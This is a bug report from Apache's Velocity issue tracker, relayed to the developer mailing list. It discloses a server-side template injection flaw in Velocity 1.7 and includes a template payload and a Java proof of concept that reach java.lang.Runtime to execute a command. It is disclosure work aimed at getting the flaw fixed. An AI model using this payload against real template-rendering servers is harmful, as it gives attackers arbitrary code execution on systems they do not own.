[jira] [Created] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

Mon, 15 Aug 2016 08:26:52 -0700 

Markus Wulftange created VELOCITY-877:
-----------------------------------------

             Summary: Access to critical fields/methods allows execution of 
arbitrary code ('Template Injection')
                 Key: VELOCITY-877
                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
             Project: Velocity
          Issue Type: Bug
          Components: Engine
    Affects Versions: 1.7
            Reporter: Markus Wulftange
            Priority: Critical


It is possible to reference certain fields/methods, which eventually allow the 
execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
any variable, it is possible to get the variable's class object. This can be 
extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the 
'{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

        public static void main(String[] args) {
                Context context = new VelocityContext();
                context.put("var", "foo");
                String instring = 
"#set($String=$var.class.class.forName('java.lang.String'))"
                                + 
"#set($Character=$var.class.class.forName('java.lang.Character'))"
                                + 
"#set($Runtime=$var.class.class.forName('java.lang.Runtime'))"
                                + 
"#set($proc=$Runtime.getRuntime().exec('xterm'))$proc.waitFor()";
                Velocity.evaluate(context, null, "templateName", instring);
        }

}
{code}

This issue has already been made public in the past by James Kettle in August 
2015 (see 
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
 and via CVE-2015-5603 (see 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
others.



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org
For additional commands, e-mail: dev-h...@velocity.apache.org

Reply via email to